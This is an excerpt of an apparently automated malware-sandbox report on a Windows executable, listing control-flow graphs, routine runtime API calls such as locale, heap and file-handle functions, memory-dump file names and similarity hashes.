                                                                                            • Instruction Fuzzy Hash: 1D219135A002199FCF25CF29DC80AEDBBB9FB98315F1440AAE906D7251E630ED46CF65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 282 5b6a92-5b6a97 283 5b6a99-5b6ab1 282->283 284 5b6abf-5b6ac8 283->284 285 5b6ab3-5b6ab7 283->285 287 5b6ada 284->287 288 5b6aca-5b6acd 284->288 285->284 286 5b6ab9-5b6abd 285->286 290 5b6b34-5b6b38 286->290 289 5b6adc-5b6ae9 GetStdHandle 287->289 291 5b6acf-5b6ad4 288->291 292 5b6ad6-5b6ad8 288->292 293 5b6aeb-5b6aed 289->293 294 5b6b16-5b6b28 289->294 290->283 295 5b6b3e-5b6b41 290->295 291->289 292->289 293->294 296 5b6aef-5b6af8 GetFileType 293->296 294->290 297 5b6b2a-5b6b2d 294->297 296->294 298 5b6afa-5b6b03 296->298 297->290 299 5b6b0b-5b6b0e 298->299 300 5b6b05-5b6b09 298->300 299->290 301 5b6b10-5b6b14 299->301 300->290 301->290
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,005B6981,005CFD98,0000000C), ref: 005B6ADE
                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,005B6981,005CFD98,0000000C), ref: 005B6AF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandleType
                                                                                            • String ID:
                                                                                            • API String ID: 3000768030-0
                                                                                            • Opcode ID: 434743182c1e3615376eaff03084b8a28bebd21e99df6a7131322d13394c47e5
                                                                                            • Instruction ID: 3b27990a62b6a24e3c78def570484142cfb3109eef85beade57fc765f92188f3
                                                                                            • Opcode Fuzzy Hash: 434743182c1e3615376eaff03084b8a28bebd21e99df6a7131322d13394c47e5
                                                                                            • Instruction Fuzzy Hash: E711E632204B518ECB348F3E8C886A2BEA5B756330B38071ED1B6D75F1D638F886D601

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 302 5b5df3-5b5e02 call 5b6162 305 5b5e2b-5b5e45 call 5b5e8f LCMapStringW 302->305 306 5b5e04-5b5e29 LCMapStringEx 302->306 310 5b5e4b-5b5e4d 305->310 306->310
                                                                                            APIs
                                                                                            • LCMapStringEx.KERNELBASE(?,005B681A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 005B5E27
                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,005B681A,?,?,-00000008,?,00000000), ref: 005B5E45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: String
                                                                                            • String ID:
                                                                                            • API String ID: 2568140703-0
                                                                                            • Opcode ID: 8a9e0c8f85ebd6d573d8a4d4c03083d743a909898214583adbee0a6e97641817
                                                                                            • Instruction ID: afca6d6e688ae32545e7d2e4e5f99d4ae0ea1fcc0f6221bd29d6e00b6a381fa3
                                                                                            • Opcode Fuzzy Hash: 8a9e0c8f85ebd6d573d8a4d4c03083d743a909898214583adbee0a6e97641817
                                                                                            • Instruction Fuzzy Hash: 21F07A3200051ABBCF126F90DC05EDE3F2AFF58760F058510FA1829020C736D971AB90

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32 ref: 005A22D8
                                                                                            • GetModuleFileNameA.KERNEL32 ref: 005A22F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Module$FileHandleName
                                                                                            • String ID:
                                                                                            • API String ID: 4146042529-0
                                                                                            • Opcode ID: bd9e80c68f2284aa5e40aadb315aea867a60b3d334d02b75b6743b0a8c2be14d
                                                                                            • Instruction ID: 507ac7a91ff230e3c2cbc7ec39e6a8ae88eb1c02612d5d3373d83e16333c477e
                                                                                            • Opcode Fuzzy Hash: bd9e80c68f2284aa5e40aadb315aea867a60b3d334d02b75b6743b0a8c2be14d
                                                                                            • Instruction Fuzzy Hash: 6901FF709152098FC754EF78E84569DBBF4FB54300F40446ED4C9D3240EB745588DF82
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID:
                                                                                            • API String ID: 4218353326-0
                                                                                            • Opcode ID: 4c3cd1c08a2589ca5bc440b2ae198aeb1f1823e55f85f5354f2ae7330525f399
                                                                                            • Instruction ID: 4a8e9cde50370c48bfe46e01886718863d00d586399816222372aa07c0253452
                                                                                            • Opcode Fuzzy Hash: 4c3cd1c08a2589ca5bc440b2ae198aeb1f1823e55f85f5354f2ae7330525f399
                                                                                            • Instruction Fuzzy Hash: CED10374604B418FC724DF38C199A6ABBE0BF8A714F148A1DE8978BBA1D734F844CB55
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(00000083,?,00000005,005B6FB8,?), ref: 005B7169
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID:
                                                                                            • API String ID: 1807457897-0
                                                                                            • Opcode ID: a22cf60f5570a0136379c0d693565d188be7446b9b2c985d56553f1f2f6a23ec
                                                                                            • Instruction ID: 82f9ace18620b350c7a6374898d1b64488c757870991f3945f228c2ac83ec676
                                                                                            • Opcode Fuzzy Hash: a22cf60f5570a0136379c0d693565d188be7446b9b2c985d56553f1f2f6a23ec
                                                                                            • Instruction Fuzzy Hash: 795149B590C15CAEDB118A68CD84BE9BFBDFB99300F1401E9E499C7182D335BD85DBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8df40b49336e4fffccab0ed2b9c025363f1dc2c649d391d1ba9bacf93bfb11f
                                                                                            • Instruction ID: 69021041042c5d11eeba3ea69a0b02e17cc9aa15ef3173dd98195521689d4bce
                                                                                            • Opcode Fuzzy Hash: a8df40b49336e4fffccab0ed2b9c025363f1dc2c649d391d1ba9bacf93bfb11f
                                                                                            • Instruction Fuzzy Hash: 7B418F35A0051AAFCB14DFA8C4909FDBBF9FF1A310B64006AE542E7640EB31F945DB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0527b141233e862ec0402c1b20fe1a2eb55d3df8a2f9f9970eed5fdf12bbc374
                                                                                            • Instruction ID: 3db30ae6db8d7bd7996d639743478f74863bcb55b329c7138b50b35897832374
                                                                                            • Opcode Fuzzy Hash: 0527b141233e862ec0402c1b20fe1a2eb55d3df8a2f9f9970eed5fdf12bbc374
                                                                                            • Instruction Fuzzy Hash: 3B0128332012195F9B22DF69EC89AAA3B75FBD1770B244126F514CB094DA35FC04ABD4
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,005B548F,00000001,00000364,00000002,000000FF,00000000,?,?,005AD225,00000000,?), ref: 005B6335
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 2db94771e390a2e47d9dc4f2231be7e413520880d8dddc8b448cff87e8ccfc14
                                                                                            • Instruction ID: f5d7e7aa216eb9ea022709ce2f2a621047efe5c7033732139ff92a1dea1a9ebb
                                                                                            • Opcode Fuzzy Hash: 2db94771e390a2e47d9dc4f2231be7e413520880d8dddc8b448cff87e8ccfc14
                                                                                            • Instruction Fuzzy Hash: 6DF08931602A25A6DF615E769C0ABEF7FD8BF81760B154922E805DB190DE34FC0486F1
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,005B6F75,?,?,005B6F75,00000220,?,?,?), ref: 005B5023
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 7ed53b7654fa39f173f129311025a15643251de7fedec5965fef9f75e3ff8f7f
                                                                                            • Instruction ID: 7d25c45562fb03a7cfb2697339b549b8c6ede210fcbe6296cae776edabec9af6
                                                                                            • Opcode Fuzzy Hash: 7ed53b7654fa39f173f129311025a15643251de7fedec5965fef9f75e3ff8f7f
                                                                                            • Instruction Fuzzy Hash: 92E06571102D5D56DB357A659C0DBDB3F48BF457E0F550121FC4596191FA21FC0191F1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: __floor_pentium4
                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                            • API String ID: 4168288129-2761157908
                                                                                            • Opcode ID: a2c74c49f6e646b7e33989545ee99dcf07236889071ca223c55fd9bacff1e005
                                                                                            • Instruction ID: 592f26d15a9c3c43325d02bc745970cb096a38a41986c80860fabb069eb8ac15
                                                                                            • Opcode Fuzzy Hash: a2c74c49f6e646b7e33989545ee99dcf07236889071ca223c55fd9bacff1e005
                                                                                            • Instruction Fuzzy Hash: 42D22871E086298FDB64CE68CC44BEABBB5FB85304F1455EAD40DE7281D778AE858F40
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,005BA46D,00000002,00000000,?,?,?,005BA46D,?,00000000), ref: 005BAB50
                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,005BA46D,00000002,00000000,?,?,?,005BA46D,?,00000000), ref: 005BAB79
                                                                                            • GetACP.KERNEL32(?,?,005BA46D,?,00000000), ref: 005BAB8E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: aa2ac833f680c09adf501772e26aae2a46af28549ee7cb84a15a1ac8c3160d8b
                                                                                            • Instruction ID: ee5bc9b5793389c87f328e23b0c58e38729c9eff9595411c704fafff447925a4
                                                                                            • Opcode Fuzzy Hash: aa2ac833f680c09adf501772e26aae2a46af28549ee7cb84a15a1ac8c3160d8b
                                                                                            • Instruction Fuzzy Hash: 0C219532700101AADB358F54C901FE7BFA7FB94B64B568424E91AD7114E732FD40D352
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 005BA43F
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 005BA47D
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 005BA490
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005BA4D8
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005BA4F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                            • String ID:
                                                                                            • API String ID: 415426439-0
                                                                                            • Opcode ID: c0645427ab4c62cc2af61a106ae7d0bffc7dbcd8ca5739d853361500e23d81a4
                                                                                            • Instruction ID: fdd6c574531e130ec197f1c4324c15700892c524a1ce211c2119b904be8f0e71
                                                                                            • Opcode Fuzzy Hash: c0645427ab4c62cc2af61a106ae7d0bffc7dbcd8ca5739d853361500e23d81a4
                                                                                            • Instruction Fuzzy Hash: 27515271A00616AFDF20DFA4DC45AFE7BB8FF58700F144469E501E7191EBB0AA048B62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d6a4fa0bf6480ef2fa740f4acb7545683e09ee9f7b1cd6b517977084591d94b
                                                                                            • Instruction ID: 1997daad22c9e3f024ac0073a7594d67f91077882dc2f654748a702fc2ff079f
                                                                                            • Opcode Fuzzy Hash: 0d6a4fa0bf6480ef2fa740f4acb7545683e09ee9f7b1cd6b517977084591d94b
                                                                                            • Instruction Fuzzy Hash: 04021871E012199BDF14CFA9C884AEEFBB5FF88314F248269D915B7341D731AA45CB90
                                                                                            APIs
                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB189
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 7bb8c8f39e1b0c3941c42dbf9a66d6feaac72412319f80b4a5046504685c01be
                                                                                            • Instruction ID: 7b79062b68bacc8d6f0b651ee33cfa5ef6ee86a10b39258ee07055cfe7c1aa50
                                                                                            • Opcode Fuzzy Hash: 7bb8c8f39e1b0c3941c42dbf9a66d6feaac72412319f80b4a5046504685c01be
                                                                                            • Instruction Fuzzy Hash: 6E71E3758051695FEF20AF288C9EAFEBFB9FB45300F1441D9E449A7211EBB16E849F10
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005A964F
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 005A971B
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005A9734
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 005A973E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 5d665b14275aefa3eb3235df4960bcb4af208f3022dbeb5df6eb46c5b65a74c2
                                                                                            • Instruction ID: 1f1990b5367ad64388dcf246eaa1f4c04902bb9f3509f6299edb6ea721a64b30
                                                                                            • Opcode Fuzzy Hash: 5d665b14275aefa3eb3235df4960bcb4af208f3022dbeb5df6eb46c5b65a74c2
                                                                                            • Instruction Fuzzy Hash: 25312775D052299BDF21DFA4D84ABCDBBB8BF08300F1041AAE50DAB250EB719A84DF45
                                                                                            APIs
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005A9F17
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 005A9F26
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 005A9F2F
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 005A9F3C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
